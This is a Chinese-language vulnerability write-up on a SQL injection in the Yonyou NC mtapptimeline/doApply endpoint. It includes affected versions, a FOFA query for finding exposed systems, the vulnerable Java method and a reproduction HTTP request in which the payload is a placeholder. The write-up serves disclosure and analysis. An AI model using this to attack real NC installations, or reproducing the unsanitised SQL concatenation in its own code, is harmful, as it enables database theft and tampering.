漏洞简介
用友NC系统的 mtapptimeline/doApply 接口存在SQL注入漏洞。攻击者可通过构造恶意的 SQL 语句注入请求参数,绕过身份验证或获取数据库敏感信息,进而可能导致任意数据读取、篡改甚至系统权限提升,影响系统的安全性和数据完整性。
影响版本
NC63、NC65
fofa语法
app="用友-UFIDA-NC"
漏洞分析
直接看MtAppTimeLineAction 类的doApply方法的实现逻辑吧
@Action
public void doApply() {
HttpServletRequest request = this.request;
String maEventPk = request.getParameter("meapk");
IMeetingApplyQueryService qs = (IMeetingApplyQueryService)NCLocator.getInstance().lookup(IMeetingApplyQueryService.class);
String whereSQL = "pk_mtappdoc='" + maEventPk + "'";
try {
MeetingApplyEventVO[] maEvents = qs.queryMeetingApplyEvents(whereSQL, (SQLParameter)null);
String pk_currentuser = LfwRuntimeEnvironment.getLfwSessionBean().getPk_user();
StringBuilder sd = new StringBuilder();
sd.append(this.bulidupXml(maEvents, pk_currentuser));
ResponseUtils.outputClientStreamWithGzip(this.getResponse(), "text/xml", sd.toString());
} catch (BusinessException e) {
Logger.error(e.getMessage(), e);
throw new LfwRuntimeException(e.getMessage());
}
}
参数meapk这里被拼接进SQL语句中,整个过程没有对参数meapk进行校验或过滤,从而造成了SQL注入漏洞,朴实无华的!
漏洞复现
需注意NC65 大多数为Oracle 少数MSSQL
POST /portal/pt/mtapptimeline/doApply HTTP/1.1
Host: nc.mrxn.net
Content-Type: application/x-www-form-urlencoded
pageId=login&meapk=SQLI_POC

通过报错注入成功在响应回显当前数据库用户!


